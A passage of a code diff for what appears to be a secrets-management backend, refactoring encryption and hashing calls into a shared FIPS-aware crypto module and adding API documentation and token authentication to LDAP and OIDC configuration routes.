 export type TMigrationEnvConfig = z.infer<typeof envSchema>;

-export const getMigrationEnvConfig = () => {
+export const getMigrationEnvConfig = async (superAdminDAL: TSuperAdminDALFactory) => {
  const parsedEnv = envSchema.safeParse(process.env);
  if (!parsedEnv.success) {
    // eslint-disable-next-line no-console
@ -49,5 +51,24 @@ export const getMigrationEnvConfig = () => {
    process.exit(-1);
  }

-  return Object.freeze(parsedEnv.data);
+  let envCfg = Object.freeze(parsedEnv.data);
+
+  const fipsEnabled = await crypto.initialize(superAdminDAL);
+
+  // Fix for 128-bit entropy encryption key expansion issue:
+  // In FIPS it is not ideal to expand a 128-bit key into 256-bit. We solved this issue in the past by creating the ROOT_ENCRYPTION_KEY.
+  // If FIPS mode is enabled, we set the value of ROOT_ENCRYPTION_KEY to the value of ENCRYPTION_KEY.
+  // ROOT_ENCRYPTION_KEY is expected to be a 256-bit base64-encoded key, unlike the 32-byte key of ENCRYPTION_KEY.
+  // When ROOT_ENCRYPTION_KEY is set, our cryptography will always use a 256-bit entropy encryption key. So for the sake of FIPS we should just roll over the value of ENCRYPTION_KEY to ROOT_ENCRYPTION_KEY.
+  if (fipsEnabled) {
+    const newEnvCfg = {
+      ...envCfg,
+      ROOT_ENCRYPTION_KEY: envCfg.ENCRYPTION_KEY
+    };
+    delete newEnvCfg.ENCRYPTION_KEY;
+
+    envCfg = Object.freeze(newEnvCfg);
+  }
+
+  return envCfg;
 };
--- a/backend/src/db/schemas/access-approval-policies-approvers.ts
+++ b/backend/src/db/schemas/access-approval-policies-approvers.ts
@ -14,8 +14,8 @@ export const AccessApprovalPoliciesApproversSchema = z.object({
  updatedAt: z.date(),
  approverUserId: z.string().uuid().nullable().optional(),
  approverGroupId: z.string().uuid().nullable().optional(),
-  sequence: z.number().default(0).nullable().optional(),
-  approvalsRequired: z.number().default(1).nullable().optional()
+  sequence: z.number().default(1).nullable().optional(),
+  approvalsRequired: z.number().nullable().optional()
 });

 export type TAccessApprovalPoliciesApprovers = z.infer<typeof AccessApprovalPoliciesApproversSchema>;
--- a/backend/src/db/schemas/access-approval-policies.ts
+++ b/backend/src/db/schemas/access-approval-policies.ts
@ -11,7 +11,7 @@ export const AccessApprovalPoliciesSchema = z.object({
  id: z.string().uuid(),
  name: z.string(),
  approvals: z.number().default(1),
-  secretPath: z.string().nullable().optional(),
+  secretPath: z.string(),
  envId: z.string().uuid(),
  createdAt: z.date(),
  updatedAt: z.date(),
--- a/backend/src/db/schemas/certificate-authorities.ts
+++ b/backend/src/db/schemas/certificate-authorities.ts
@ -12,8 +12,8 @@ export const CertificateAuthoritiesSchema = z.object({
  createdAt: z.date(),
  updatedAt: z.date(),
  projectId: z.string(),
-  enableDirectIssuance: z.boolean().default(true),
  status: z.string(),
+  enableDirectIssuance: z.boolean().default(true),
  name: z.string()
 });

--- a/backend/src/db/schemas/certificates.ts
+++ b/backend/src/db/schemas/certificates.ts
@ -25,8 +25,8 @@ export const CertificatesSchema = z.object({
  certificateTemplateId: z.string().uuid().nullable().optional(),
  keyUsages: z.string().array().nullable().optional(),
  extendedKeyUsages: z.string().array().nullable().optional(),
-  pkiSubscriberId: z.string().uuid().nullable().optional(),
-  projectId: z.string()
+  projectId: z.string(),
+  pkiSubscriberId: z.string().uuid().nullable().optional()
 });

 export type TCertificates = z.infer<typeof CertificatesSchema>;
--- a/backend/src/db/schemas/org-memberships.ts
+++ b/backend/src/db/schemas/org-memberships.ts
@ -18,7 +18,8 @@ export const OrgMembershipsSchema = z.object({
  orgId: z.string().uuid(),
  roleId: z.string().uuid().nullable().optional(),
  projectFavorites: z.string().array().nullable().optional(),
-  isActive: z.boolean().default(true)
+  isActive: z.boolean().default(true),
+  lastInvitedAt: z.date().nullable().optional()
 });

 export type TOrgMemberships = z.infer<typeof OrgMembershipsSchema>;
--- a/backend/src/db/schemas/secret-approval-policies.ts
+++ b/backend/src/db/schemas/secret-approval-policies.ts
@ -10,7 +10,7 @@ import { TImmutableDBKeys } from "./models";
 export const SecretApprovalPoliciesSchema = z.object({
  id: z.string().uuid(),
  name: z.string(),
-  secretPath: z.string().nullable().optional(),
+  secretPath: z.string(),
  approvals: z.number().default(1),
  envId: z.string().uuid(),
  createdAt: z.date(),
--- a/backend/src/db/schemas/secret-approval-requests.ts
+++ b/backend/src/db/schemas/secret-approval-requests.ts
@ -18,7 +18,7 @@ export const SecretApprovalRequestsSchema = z.object({
  createdAt: z.date(),
  updatedAt: z.date(),
  isReplicated: z.boolean().nullable().optional(),
-  committerUserId: z.string().uuid(),
+  committerUserId: z.string().uuid().nullable().optional(),
  statusChangedByUserId: z.string().uuid().nullable().optional(),
  bypassReason: z.string().nullable().optional()
 });
--- a/backend/src/db/schemas/super-admin.ts
+++ b/backend/src/db/schemas/super-admin.ts
@ -34,7 +34,9 @@ export const SuperAdminSchema = z.object({
  encryptedGitHubAppConnectionClientSecret: zodBuffer.nullable().optional(),
  encryptedGitHubAppConnectionSlug: zodBuffer.nullable().optional(),
  encryptedGitHubAppConnectionId: zodBuffer.nullable().optional(),
-  encryptedGitHubAppConnectionPrivateKey: zodBuffer.nullable().optional()
+  encryptedGitHubAppConnectionPrivateKey: zodBuffer.nullable().optional(),
+  encryptedEnvOverrides: zodBuffer.nullable().optional(),
+  fipsEnabled: z.boolean().default(false)
 });

 export type TSuperAdmin = z.infer<typeof SuperAdminSchema>;
--- a/backend/src/db/seed-data.ts
+++ b/backend/src/db/seed-data.ts
@ -1,18 +1,8 @@
 /* eslint-disable import/no-mutable-exports */
-import crypto from "node:crypto";
-
 import argon2, { argon2id } from "argon2";
 import jsrp from "jsrp";
-import nacl from "tweetnacl";
-import { encodeBase64 } from "tweetnacl-util";

-import {
-  decryptAsymmetric,
-  // decryptAsymmetric,
-  decryptSymmetric128BitHexKeyUTF8,
-  encryptAsymmetric,
-  encryptSymmetric128BitHexKeyUTF8
-} from "@app/lib/crypto";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";

 import { TSecrets, TUserEncryptionKeys } from "./schemas";

@ -62,11 +52,7 @@ export const seedData1 = {
 };

 export const generateUserSrpKeys = async (password: string) => {
-  const pair = nacl.box.keyPair();
-  const secretKeyUint8Array = pair.secretKey;
-  const publicKeyUint8Array = pair.publicKey;
-  const privateKey = encodeBase64(secretKeyUint8Array);
-  const publicKey = encodeBase64(publicKeyUint8Array);
+  const { publicKey, privateKey } = await crypto.encryption().asymmetric().generateKeyPair();

  // eslint-disable-next-line
  const client = new jsrp.client();
@ -98,7 +84,11 @@ export const generateUserSrpKeys = async (password: string) => {
    ciphertext: encryptedPrivateKey,
    iv: encryptedPrivateKeyIV,
    tag: encryptedPrivateKeyTag
-  } = encryptSymmetric128BitHexKeyUTF8(privateKey, key);
+  } = crypto.encryption().symmetric().encrypt({
+    plaintext: privateKey,
+    key,
+    keySize: SymmetricKeySize.Bits128
+  });

  // create the protected key by encrypting the symmetric key
  // [key] with the derived key
@ -106,7 +96,10 @@ export const generateUserSrpKeys = async (password: string) => {
    ciphertext: protectedKey,
    iv: protectedKeyIV,
    tag: protectedKeyTag
-  } = encryptSymmetric128BitHexKeyUTF8(key.toString("hex"), derivedKey);
+  } = crypto
+    .encryption()
+    .symmetric()
+    .encrypt({ plaintext: key.toString("hex"), key: derivedKey, keySize: SymmetricKeySize.Bits128 });

  return {
    protectedKey,
@ -133,30 +126,38 @@ export const getUserPrivateKey = async (password: string, user: TUserEncryptionK
  });
  if (!derivedKey) throw new Error("Failed to derive key from password");

-  const key = decryptSymmetric128BitHexKeyUTF8({
-    ciphertext: user.protectedKey as string,
-    iv: user.protectedKeyIV as string,
-    tag: user.protectedKeyTag as string,
-    key: derivedKey
-  });
+  const key = crypto
+    .encryption()
+    .symmetric()
+    .decrypt({
+      ciphertext: user.protectedKey as string,
+      iv: user.protectedKeyIV as string,
+      tag: user.protectedKeyTag as string,
+      key: derivedKey,
+      keySize: SymmetricKeySize.Bits128
+    });

-  const privateKey = decryptSymmetric128BitHexKeyUTF8({
-    ciphertext: user.encryptedPrivateKey,
-    iv: user.iv,
-    tag: user.tag,
-    key: Buffer.from(key, "hex")
-  });
+  const privateKey = crypto
+    .encryption()
+    .symmetric()
+    .decrypt({
+      ciphertext: user.encryptedPrivateKey,
+      iv: user.iv,
+      tag: user.tag,
+      key: Buffer.from(key, "hex"),
+      keySize: SymmetricKeySize.Bits128
+    });
  return privateKey;
 };

 export const buildUserProjectKey = (privateKey: string, publickey: string) => {
  const randomBytes = crypto.randomBytes(16).toString("hex");
-  const { nonce, ciphertext } = encryptAsymmetric(randomBytes, publickey, privateKey);
+  const { nonce, ciphertext } = crypto.encryption().asymmetric().encrypt(randomBytes, publickey, privateKey);
  return { nonce, ciphertext };
 };

 export const getUserProjectKey = async (privateKey: string, ciphertext: string, nonce: string, publicKey: string) => {
-  return decryptAsymmetric({
+  return crypto.encryption().asymmetric().decrypt({
    ciphertext,
    nonce,
    publicKey,
@ -170,21 +171,39 @@ export const encryptSecret = (encKey: string, key: string, value?: string, comme
    ciphertext: secretKeyCiphertext,
    iv: secretKeyIV,
    tag: secretKeyTag
-  } = encryptSymmetric128BitHexKeyUTF8(key, encKey);
+  } = crypto.encryption().symmetric().encrypt({
+    plaintext: key,
+    key: encKey,
+    keySize: SymmetricKeySize.Bits128
+  });

  // encrypt value
  const {
    ciphertext: secretValueCiphertext,
    iv: secretValueIV,
    tag: secretValueTag
-  } = encryptSymmetric128BitHexKeyUTF8(value ?? "", encKey);
+  } = crypto
+    .encryption()
+    .symmetric()
+    .encrypt({
+      plaintext: value ?? "",
+      key: encKey,
+      keySize: SymmetricKeySize.Bits128
+    });

  // encrypt comment
  const {
    ciphertext: secretCommentCiphertext,
    iv: secretCommentIV,
    tag: secretCommentTag
-  } = encryptSymmetric128BitHexKeyUTF8(comment ?? "", encKey);
+  } = crypto
+    .encryption()
+    .symmetric()
+    .encrypt({
+      plaintext: comment ?? "",
+      key: encKey,
+      keySize: SymmetricKeySize.Bits128
+    });

  return {
    secretKeyCiphertext,
@ -200,27 +219,30 @@ export const encryptSecret = (encKey: string, key: string, value?: string, comme
 };

 export const decryptSecret = (decryptKey: string, encSecret: TSecrets) => {
-  const secretKey = decryptSymmetric128BitHexKeyUTF8({
+  const secretKey = crypto.encryption().symmetric().decrypt({
    key: decryptKey,
    ciphertext: encSecret.secretKeyCiphertext,
    tag: encSecret.secretKeyTag,
-    iv: encSecret.secretKeyIV
+    iv: encSecret.secretKeyIV,
+    keySize: SymmetricKeySize.Bits128
  });

-  const secretValue = decryptSymmetric128BitHexKeyUTF8({
+  const secretValue = crypto.encryption().symmetric().decrypt({
    key: decryptKey,
    ciphertext: encSecret.secretValueCiphertext,
    tag: encSecret.secretValueTag,
-    iv: encSecret.secretValueIV
+    iv: encSecret.secretValueIV,
+    keySize: SymmetricKeySize.Bits128
  });

  const secretComment =
    encSecret.secretCommentIV && encSecret.secretCommentTag && encSecret.secretCommentCiphertext
-      ? decryptSymmetric128BitHexKeyUTF8({
+      ? crypto.encryption().symmetric().decrypt({
          key: decryptKey,
          ciphertext: encSecret.secretCommentCiphertext,
          tag: encSecret.secretCommentTag,
-          iv: encSecret.secretCommentIV
+          iv: encSecret.secretCommentIV,
+          keySize: SymmetricKeySize.Bits128
        })
      : "";

--- a/backend/src/db/seeds/1-user.ts
+++ b/backend/src/db/seeds/1-user.ts
@ -1,5 +1,9 @@
 import { Knex } from "knex";

+import { crypto } from "@app/lib/crypto";
+import { initLogger } from "@app/lib/logger";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
+
 import { AuthMethod } from "../../services/auth/auth-type";
 import { TableName } from "../schemas";
 import { generateUserSrpKeys, seedData1 } from "../seed-data";
@ -10,6 +14,11 @@ export async function seed(knex: Knex): Promise<void> {
  await knex(TableName.UserEncryptionKey).del();
  await knex(TableName.SuperAdmin).del();

+  initLogger();
+
+  const superAdminDAL = superAdminDALFactory(knex);
+  await crypto.initialize(superAdminDAL);
+
  await knex(TableName.SuperAdmin).insert([
    // eslint-disable-next-line
    // @ts-ignore
--- a/backend/src/db/seeds/3-project.ts
+++ b/backend/src/db/seeds/3-project.ts
@ -1,8 +1,6 @@
-import crypto from "node:crypto";
-
 import { Knex } from "knex";

-import { encryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";

 import { ProjectMembershipRole, ProjectType, SecretEncryptionAlgo, SecretKeyEncoding, TableName } from "../schemas";
 import { buildUserProjectKey, getUserPrivateKey, seedData1 } from "../seed-data";
@ -72,7 +70,11 @@ export async function seed(knex: Knex): Promise<void> {
  const encKey = process.env.ENCRYPTION_KEY;
  if (!encKey) throw new Error("Missing ENCRYPTION_KEY");
  const salt = crypto.randomBytes(16).toString("base64");
-  const secretBlindIndex = encryptSymmetric128BitHexKeyUTF8(salt, encKey);
+  const secretBlindIndex = crypto.encryption().symmetric().encrypt({
+    plaintext: salt,
+    key: encKey,
+    keySize: SymmetricKeySize.Bits128
+  });
  // insert secret blind index for project
  await knex(TableName.SecretBlindIndex).insert({
    projectId: project.id,
--- a/backend/src/db/seeds/5-machine-identity.ts
+++ b/backend/src/db/seeds/5-machine-identity.ts
@ -1,6 +1,7 @@
-import bcrypt from "bcrypt";
 import { Knex } from "knex";

+import { crypto } from "@app/lib/crypto/cryptography";
+
 import { IdentityAuthMethod, OrgMembershipRole, ProjectMembershipRole, TableName } from "../schemas";
 import { seedData1 } from "../seed-data";

@ -54,7 +55,9 @@ export async function seed(knex: Knex): Promise<void> {
      }
    ])
    .returning("*");
-  const clientSecretHash = await bcrypt.hash(seedData1.machineIdentity.clientCredentials.secret, 10);
+
+  const clientSecretHash = await crypto.hashing().createHash(seedData1.machineIdentity.clientCredentials.secret, 10);
+
  await knex(TableName.IdentityUaClientSecret).insert([
    {
      identityUAId: identityUa[0].id,
--- a/backend/src/ee/routes/est/certificate-est-router.ts
+++ b/backend/src/ee/routes/est/certificate-est-router.ts
@ -1,7 +1,7 @@
-import bcrypt from "bcrypt";
 import { z } from "zod";

 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, UnauthorizedError } from "@app/lib/errors";
 import { readLimit, writeLimit } from "@app/server/config/rateLimiter";

@ -85,7 +85,7 @@ export const registerCertificateEstRouter = async (server: FastifyZodProvider) =
      });
    }

-    const isPasswordValid = await bcrypt.compare(password, estConfig.hashedPassphrase);
+    const isPasswordValid = await crypto.hashing().compareHash(password, estConfig.hashedPassphrase);
    if (!isPasswordValid) {
      throw new UnauthorizedError({
        message: "Invalid credentials"
--- a/backend/src/ee/routes/v1/access-approval-policy-router.ts
+++ b/backend/src/ee/routes/v1/access-approval-policy-router.ts
@ -2,6 +2,7 @@ import { nanoid } from "nanoid";
 import { z } from "zod";

 import { ApproverType, BypasserType } from "@app/ee/services/access-approval-policy/access-approval-policy-types";
+import { removeTrailingSlash } from "@app/lib/fn";
 import { EnforcementLevel } from "@app/lib/types";
 import { readLimit, writeLimit } from "@app/server/config/rateLimiter";
 import { verifyAuth } from "@app/server/plugins/auth/verify-auth";
@ -19,7 +20,7 @@ export const registerAccessApprovalPolicyRouter = async (server: FastifyZodProvi
      body: z.object({
        projectSlug: z.string().trim(),
        name: z.string().optional(),
-        secretPath: z.string().trim().default("/"),
+        secretPath: z.string().trim().min(1, { message: "Secret path cannot be empty" }).transform(removeTrailingSlash),
        environment: z.string(),
        approvers: z
          .discriminatedUnion("type", [
@ -174,8 +175,9 @@ export const registerAccessApprovalPolicyRouter = async (server: FastifyZodProvi
        secretPath: z
          .string()
          .trim()
+          .min(1, { message: "Secret path cannot be empty" })
          .optional()
-          .transform((val) => (val === "" ? "/" : val)),
+          .transform((val) => (val ? removeTrailingSlash(val) : val)),
        approvers: z
          .discriminatedUnion("type", [
            z.object({
--- a/backend/src/ee/routes/v1/ldap-router.ts
+++ b/backend/src/ee/routes/v1/ldap-router.ts
@ -17,6 +17,7 @@ import { z } from "zod";
 import { LdapGroupMapsSchema } from "@app/db/schemas";
 import { TLDAPConfig } from "@app/ee/services/ldap-config/ldap-config-types";
 import { isValidLdapFilter, searchGroups } from "@app/ee/services/ldap-config/ldap-fns";
+import { ApiDocsTags, LdapSso } from "@app/lib/api-docs";
 import { getConfig } from "@app/lib/config/env";
 import { BadRequestError } from "@app/lib/errors";
 import { logger } from "@app/lib/logger";
@ -132,10 +133,18 @@ export const registerLdapRouter = async (server: FastifyZodProvider) => {
    config: {
      rateLimit: readLimit
    },
-    onRequest: verifyAuth([AuthMode.JWT]),
+    onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]),
    schema: {
+      hide: false,
+      tags: [ApiDocsTags.LdapSso],
+      description: "Get LDAP config",
+      security: [
+        {
+          bearerAuth: []
+        }
+      ],
      querystring: z.object({
-        organizationId: z.string().trim()
+        organizationId: z.string().trim().describe(LdapSso.GET_CONFIG.organizationId)
      }),
      response: {
        200: z.object({
@ -172,23 +181,32 @@ export const registerLdapRouter = async (server: FastifyZodProvider) => {
    config: {
      rateLimit: writeLimit
    },
-    onRequest: verifyAuth([AuthMode.JWT]),
+    onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]),
    schema: {
+      hide: false,
+      tags: [ApiDocsTags.LdapSso],
+      description: "Create LDAP config",
+      security: [
+        {
+          bearerAuth: []
+        }
+      ],
      body: z.object({
-        organizationId: z.string().trim(),
-        isActive: z.boolean(),
-        url: z.string().trim(),
-        bindDN: z.string().trim(),
-        bindPass: z.string().trim(),
-        uniqueUserAttribute: z.string().trim().default("uidNumber"),
-        searchBase: z.string().trim(),
-        searchFilter: z.string().trim().default("(uid={{username}})"),
-        groupSearchBase: z.string().trim(),
+        organizationId: z.string().trim().describe(LdapSso.CREATE_CONFIG.organizationId),
+        isActive: z.boolean().describe(LdapSso.CREATE_CONFIG.isActive),
+        url: z.string().trim().describe(LdapSso.CREATE_CONFIG.url),
+        bindDN: z.string().trim().describe(LdapSso.CREATE_CONFIG.bindDN),
+        bindPass: z.string().trim().describe(LdapSso.CREATE_CONFIG.bindPass),
+        uniqueUserAttribute: z.string().trim().default("uidNumber").describe(LdapSso.CREATE_CONFIG.uniqueUserAttribute),
+        searchBase: z.string().trim().describe(LdapSso.CREATE_CONFIG.searchBase),
+        searchFilter: z.string().trim().default("(uid={{username}})").describe(LdapSso.CREATE_CONFIG.searchFilter),
+        groupSearchBase: z.string().trim().describe(LdapSso.CREATE_CONFIG.groupSearchBase),
        groupSearchFilter: z
          .string()
          .trim()
-          .default("(|(memberUid={{.Username}})(member={{.UserDN}})(uniqueMember={{.UserDN}}))"),
-        caCert: z.string().trim().default("")
+          .default("(|(memberUid={{.Username}})(member={{.UserDN}})(uniqueMember={{.UserDN}}))")
+          .describe(LdapSso.CREATE_CONFIG.groupSearchFilter),
+        caCert: z.string().trim().default("").describe(LdapSso.CREATE_CONFIG.caCert)
      }),
      response: {
        200: SanitizedLdapConfigSchema
@ -214,23 +232,31 @@ export const registerLdapRouter = async (server: FastifyZodProvider) => {
    config: {
      rateLimit: writeLimit
    },
-    onRequest: verifyAuth([AuthMode.JWT]),
+    onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]),
    schema: {
+      hide: false,
+      tags: [ApiDocsTags.LdapSso],
+      description: "Update LDAP config",
+      security: [
+        {
+          bearerAuth: []
+        }
+      ],
      body: z
        .object({
-          isActive: z.boolean(),
-          url: z.string().trim(),
-          bindDN: z.string().trim(),
-          bindPass: z.string().trim(),
-          uniqueUserAttribute: z.string().trim(),
-          searchBase: z.string().trim(),
-          searchFilter: z.string().trim(),
-          groupSearchBase: z.string().trim(),
-          groupSearchFilter: z.string().trim(),
-          caCert: z.string().trim()
+          isActive: z.boolean().describe(LdapSso.UPDATE_CONFIG.isActive),
+          url: z.string().trim().describe(LdapSso.UPDATE_CONFIG.url),
+          bindDN: z.string().trim().describe(LdapSso.UPDATE_CONFIG.bindDN),
+          bindPass: z.string().trim().describe(LdapSso.UPDATE_CONFIG.bindPass),
+          uniqueUserAttribute: z.string().trim().describe(LdapSso.UPDATE_CONFIG.uniqueUserAttribute),
+          searchBase: z.string().trim().describe(LdapSso.UPDATE_CONFIG.searchBase),
+          searchFilter: z.string().trim().describe(LdapSso.UPDATE_CONFIG.searchFilter),
+          groupSearchBase: z.string().trim().describe(LdapSso.UPDATE_CONFIG.groupSearchBase),
+          groupSearchFilter: z.string().trim().describe(LdapSso.UPDATE_CONFIG.groupSearchFilter),
+          caCert: z.string().trim().describe(LdapSso.UPDATE_CONFIG.caCert)
        })
        .partial()
-        .merge(z.object({ organizationId: z.string() })),
+        .merge(z.object({ organizationId: z.string().trim().describe(LdapSso.UPDATE_CONFIG.organizationId) })),
      response: {
        200: SanitizedLdapConfigSchema
      }
--- a/backend/src/ee/routes/v1/oidc-router.ts
+++ b/backend/src/ee/routes/v1/oidc-router.ts
@ -13,6 +13,7 @@ import { z } from "zod";

 import { OidcConfigsSchema } from "@app/db/schemas";
 import { OIDCConfigurationType, OIDCJWTSignatureAlgorithm } from "@app/ee/services/oidc/oidc-config-types";
+import { ApiDocsTags, OidcSSo } from "@app/lib/api-docs";
 import { getConfig } from "@app/lib/config/env";
 import { authRateLimit, readLimit, writeLimit } from "@app/server/config/rateLimiter";
 import { verifyAuth } from "@app/server/plugins/auth/verify-auth";
@ -153,10 +154,18 @@ export const registerOidcRouter = async (server: FastifyZodProvider) => {
    config: {
      rateLimit: readLimit
    },
-    onRequest: verifyAuth([AuthMode.JWT]),
+    onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]),
    schema: {
+      hide: false,
+      tags: [ApiDocsTags.OidcSso],
+      description: "Get OIDC config",
+      security: [
+        {
+          bearerAuth: []
+        }
+      ],
      querystring: z.object({
-        orgSlug: z.string().trim()
+        organizationId: z.string().trim().describe(OidcSSo.GET_CONFIG.organizationId)
      }),
      response: {
        200: SanitizedOidcConfigSchema.pick({
@ -180,9 +189,8 @@ export const registerOidcRouter = async (server: FastifyZodProvider) => {
      }
    },
    handler: async (req) => {
-      const { orgSlug } = req.query;
      const oidc = await server.services.oidc.getOidc({
-        orgSlug,
+        organizationId: req.query.organizationId,
        type: "external",
        actor: req.permission.type,
        actorId: req.permission.id,
@ -200,8 +208,16 @@ export const registerOidcRouter = async (server: FastifyZodProvider) => {
    config: {
      rateLimit: writeLimit
    },
-    onRequest: verifyAuth([AuthMode.JWT]),
+    onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]),
    schema: {
+      hide: false,
+      tags: [ApiDocsTags.OidcSso],
+      description: "Update OIDC config",
+      security: [
+        {
+          bearerAuth: []
+        }
+      ],
      body: z
        .object({
          allowedEmailDomains: z
@ -216,22 +232,26 @@ export const registerOidcRouter = async (server: FastifyZodProvider) => {
                .split(",")
                .map((id) => id.trim())
                .join(", ");
-            }),
-          discoveryURL: z.string().trim(),
-          configurationType: z.nativeEnum(OIDCConfigurationType),
-          issuer: z.string().trim(),
-          authorizationEndpoint: z.string().trim(),
-          jwksUri: z.string().trim(),
-          tokenEndpoint: z.string().trim(),
-          userinfoEndpoint: z.string().trim(),
-          clientId: z.string().trim(),
-          clientSecret: z.string().trim(),
-          isActive: z.boolean(),
-          manageGroupMemberships: z.boolean().optional(),
-          jwtSignatureAlgorithm: z.nativeEnum(OIDCJWTSignatureAlgorithm).optional()
+            })
+            .describe(OidcSSo.UPDATE_CONFIG.allowedEmailDomains),
+          discoveryURL: z.string().trim().describe(OidcSSo.UPDATE_CONFIG.discoveryURL),
+          configurationType: z.nativeEnum(OIDCConfigurationType).describe(OidcSSo.UPDATE_CONFIG.configurationType),
+          issuer: z.string().trim().describe(OidcSSo.UPDATE_CONFIG.issuer),
+          authorizationEndpoint: z.string().trim().describe(OidcSSo.UPDATE_CONFIG.authorizationEndpoint),
+          jwksUri: z.string().trim().describe(OidcSSo.UPDATE_CONFIG.jwksUri),
+          tokenEndpoint: z.string().trim().describe(OidcSSo.UPDATE_CONFIG.tokenEndpoint),
+          userinfoEndpoint: z.string().trim().describe(OidcSSo.UPDATE_CONFIG.userinfoEndpoint),
+          clientId: z.string().trim().describe(OidcSSo.UPDATE_CONFIG.clientId),
+          clientSecret: z.string().trim().describe(OidcSSo.UPDATE_CONFIG.clientSecret),
+          isActive: z.boolean().describe(OidcSSo.UPDATE_CONFIG.isActive),
+          manageGroupMemberships: z.boolean().optional().describe(OidcSSo.UPDATE_CONFIG.manageGroupMemberships),
+          jwtSignatureAlgorithm: z
+            .nativeEnum(OIDCJWTSignatureAlgorithm)
+            .optional()
+            .describe(OidcSSo.UPDATE_CONFIG.jwtSignatureAlgorithm)
        })
        .partial()
-        .merge(z.object({ orgSlug: z.string() })),
+        .merge(z.object({ organizationId: z.string().describe(OidcSSo.UPDATE_CONFIG.organizationId) })),
      response: {
        200: SanitizedOidcConfigSchema.pick({
          id: true,
@ -267,8 +287,16 @@ export const registerOidcRouter = async (server: FastifyZodProvider) => {
    config: {
      rateLimit: writeLimit
    },
-    onRequest: verifyAuth([AuthMode.JWT]),
+    onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]),
    schema: {
+      hide: false,
+      tags: [ApiDocsTags.OidcSso],
+      description: "Create OIDC config",
+      security: [
+        {
+          bearerAuth: []
+        }
+      ],
      body: z
        .object({
          allowedEmailDomains: z
@ -283,23 +311,34 @@ export const registerOidcRouter = async (server: FastifyZodProvider) => {
                .split(",")
                .map((id) => id.trim())
                .join(", ");
-            }),
-          configurationType: z.nativeEnum(OIDCConfigurationType),
-          issuer: z.string().trim().optional().default(""),
-          discoveryURL: z.string().trim().optional().default(""),
-          authorizationEndpoint: z.string().trim().optional().default(""),
-          jwksUri: z.string().trim().optional().default(""),
-          tokenEndpoint: z.string().trim().optional().default(""),
-          userinfoEndpoint: z.string().trim().optional().default(""),
-          clientId: z.string().trim(),
-          clientSecret: z.string().trim(),
-          isActive: z.boolean(),
-          orgSlug: z.string().trim(),
-          manageGroupMemberships: z.boolean().optional().default(false),
+            })
+            .describe(OidcSSo.CREATE_CONFIG.allowedEmailDomains),
+          configurationType: z.nativeEnum(OIDCConfigurationType).describe(OidcSSo.CREATE_CONFIG.configurationType),
+          issuer: z.string().trim().optional().default("").describe(OidcSSo.CREATE_CONFIG.issuer),
+          discoveryURL: z.string().trim().optional().default("").describe(OidcSSo.CREATE_CONFIG.discoveryURL),
+          authorizationEndpoint: z
+            .string()
+            .trim()
+            .optional()
+            .default("")
+            .describe(OidcSSo.CREATE_CONFIG.authorizationEndpoint),
+          jwksUri: z.string().trim().optional().default("").describe(OidcSSo.CREATE_CONFIG.jwksUri),
+          tokenEndpoint: z.string().trim().optional().default("").describe(OidcSSo.CREATE_CONFIG.tokenEndpoint),
+          userinfoEndpoint: z.string().trim().optional().default("").describe(OidcSSo.CREATE_CONFIG.userinfoEndpoint),
+          clientId: z.string().trim().describe(OidcSSo.CREATE_CONFIG.clientId),
+          clientSecret: z.string().trim().describe(OidcSSo.CREATE_CONFIG.clientSecret),
+          isActive: z.boolean().describe(OidcSSo.CREATE_CONFIG.isActive),
+          organizationId: z.string().trim().describe(OidcSSo.CREATE_CONFIG.organizationId),
+          manageGroupMemberships: z
+            .boolean()
+            .optional()
+            .default(false)
+            .describe(OidcSSo.CREATE_CONFIG.manageGroupMemberships),
          jwtSignatureAlgorithm: z
            .nativeEnum(OIDCJWTSignatureAlgorithm)
            .optional()
            .default(OIDCJWTSignatureAlgorithm.RS256)
+            .describe(OidcSSo.CREATE_CONFIG.jwtSignatureAlgorithm)
        })
        .superRefine((data, ctx) => {
          if (data.configurationType === OIDCConfigurationType.CUSTOM) {
--- a/backend/src/ee/routes/v1/project-router.ts
+++ b/backend/src/ee/routes/v1/project-router.ts
@ -111,15 +111,38 @@ export const registerProjectRouter = async (server: FastifyZodProvider) => {
      params: z.object({
        workspaceId: z.string().trim().describe(AUDIT_LOGS.EXPORT.projectId)
      }),
-      querystring: z.object({
-        eventType: z.nativeEnum(EventType).optional().describe(AUDIT_LOGS.EXPORT.eventType),
-        userAgentType: z.nativeEnum(UserAgentType).optional().describe(AUDIT_LOGS.EXPORT.userAgentType),
-        startDate: z.string().datetime().optional().describe(AUDIT_LOGS.EXPORT.startDate),
-        endDate: z.string().datetime().optional().describe(AUDIT_LOGS.EXPORT.endDate),
-        offset: z.coerce.number().default(0).describe(AUDIT_LOGS.EXPORT.offset),
-        limit: z.coerce.number().default(20).describe(AUDIT_LOGS.EXPORT.limit),
-        actor: z.string().optional().describe(AUDIT_LOGS.EXPORT.actor)
-      }),
+      querystring: z
+        .object({
+          eventType: z.nativeEnum(EventType).optional().describe(AUDIT_LOGS.EXPORT.eventType),
+          userAgentType: z.nativeEnum(UserAgentType).optional().describe(AUDIT_LOGS.EXPORT.userAgentType),
+          startDate: z.string().datetime().optional().describe(AUDIT_LOGS.EXPORT.startDate),
+          endDate: z.string().datetime().optional().describe(AUDIT_LOGS.EXPORT.endDate),
+          offset: z.coerce.number().default(0).describe(AUDIT_LOGS.EXPORT.offset),
+          limit: z.coerce.number().max(1000).default(20).describe(AUDIT_LOGS.EXPORT.limit),
+          actor: z.string().optional().describe(AUDIT_LOGS.EXPORT.actor)
+        })
+        .superRefine((el, ctx) => {
+          if (el.endDate && el.startDate) {
+            const startDate = new Date(el.startDate);
+            const endDate = new Date(el.endDate);
+            const maxAllowedDate = new Date(startDate);
+            maxAllowedDate.setMonth(maxAllowedDate.getMonth() + 3);
+            if (endDate < startDate) {
